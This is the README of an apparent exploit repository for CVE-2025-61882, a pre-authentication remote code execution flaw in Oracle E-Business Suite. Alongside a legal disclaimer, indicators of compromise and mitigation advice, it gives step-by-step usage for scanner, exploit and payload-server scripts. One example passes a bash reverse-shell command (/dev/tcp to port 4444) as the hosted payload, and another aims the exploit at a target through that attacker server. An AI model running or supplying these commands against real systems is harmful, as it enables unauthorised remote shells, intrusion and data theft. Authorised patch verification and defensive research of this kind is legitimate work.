CVE-2025-61882: Oracle E-Business Suite RCE Scanner and Exploit # CVE‑2025‑61882 Scan/Exploit
## ⚠️Legal Disclaimer
> **Legal & Ethical Notice**
>
> The tools and examples in this repository are intended **only** for authorized security testing, defensive research, and patch verification on systems you own or where you have explicit written permission to test. Running scanning or exploitation tools against systems without permission is illegal, unethical, and may cause service disruption or data loss. The repository authors and maintainers accept **no responsibility** for misuse. By using anything in this repository you confirm you have the necessary authorization and will comply with applicable law.
---
## 📖 About CVE‑2025‑61882
- **Affected Product(s):** Oracle E‑Business Suite (EBS) — BI Publisher / Template processing components (reported in impacted 12.2.x series).
- **Vulnerability Type:** Server‑side template / XML/XSLT injection leading to unauthenticated remote code execution (RCE) when malicious templates are processed.
- **Attack Vector:** Network (HTTP/S) — exploit can be triggered remotely.
- **Authentication Required:** **No** (pre‑auth exploitation reported).
- **User Interaction Required:** **No**.
- **Impact:** Remote code execution, full compromise of the affected EBS process, potential lateral movement, data theft and persistence mechanisms.
- **Patch Status:** Oracle released an emergency patch and advisory (organizations should apply Oracle's provided update/mitigation immediately). Always verify patch details against Oracle’s official advisory for your specific EBS version.
> **Note:** The above is a concise summary intended for README usage. For operational decisions consult Oracle’s official advisory, trusted vendor writeups, and your internal risk assessment.
#### 🔐 CVSS v3.1 Base Score
- **Score**: 9.8 (**Critical**)
- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
---
## Indicators of Compromise (IOCs) & Observed Behaviour
- Suspicious HTTP requests to EBS endpoints (examples to monitor):
- `/OA_HTML/configurator/UiServlet`
- Template preview endpoints or pages that accept XSLT/XML template uploads
- Evidence of spawned shell/child processes from Java processes or anomalous Java classes loaded at runtime
---
## Mitigation & Defensive Recommendations
1. **Apply official patches** from Oracle immediately for affected EBS versions.
2. **Isolate/segment** EBS servers — restrict inbound access and restrict egress to only required destinations.
3. **Hunt** for malicious templates and suspicious entries in EBS template storage and database LOBs.
4. **Monitor** logs and HTTP access to template upload/preview endpoints and alert on unusual parameters or large POST payloads.
5. **Block or carefully filter** requests to administrative/templates endpoints at perimeter WAFs with strict rules.
6. **Collect forensic artifacts** (memory, process lists, DB snapshots) before patching if you suspect active compromise.
---
## Repository Structure
```
.
├── README.md # <-- this file
├── scan.py
├── exploit.py
├── server.py
```
---
## Usage — tools in this repo
**Important:** Only run these tools in a lab or on systems for which you have explicit authorization.
This repository contains three Python scripts (tooling is intentionally minimal and intended for test‑lab verification):
- `scan.py` — scanning utility to probe a host for the presence of the vulnerable endpoint(s).
- `exploit.py` — exploitation helper script to interact with a target and trigger template processing.
- `server.py` — simple HTTP server to host an XSL/XSLT payload that the `exploit.py` script references when testing.
### `scan.py` — Example usage
Purpose: non‑destructive checks for exposed EBS endpoints and quick fingerprinting.
**Example:**
```bash
python3 scan.py target_url webhook
python3 scan.py http://apps.example.com:8000/ example.requestrepo.com
```
### `server.py` — Example usage
Purpose: host an XSL(XSLT) payload for controlled tests so `exploit.py` can reference it.
**Example:**
```bash
python3 server.py server_port target_system command
python3 server.py 80 linux 'bash -i >& /dev/tcp/8.8.8.8/4444 0>&1'
python3 server.py 80 windows 'calc'
```
### `exploit.py` — Example usage
Purpose: demonstration / testing harness that triggers template processing on a target by referencing an externally hosted XSL payload.
**Example:**
```bash
python3 exploit.py target_url config_server_host_port
python3 exploit.py http://apps.example.com:8000/ 8.8.8.8:80
```
Notes:
- **Do not** run `exploit.py` against production systems or any system without explicit authorization.
---
[4.0K] /data/pocs/8996aec5993bda5a768dd5400e4609517786e264
├── [3.9K] exploit.py
├── [4.7K] README.md
├── [ 25] requirements.txt
├── [3.1K] scan.py
└── [2.5K] server.py
1 directory, 5 files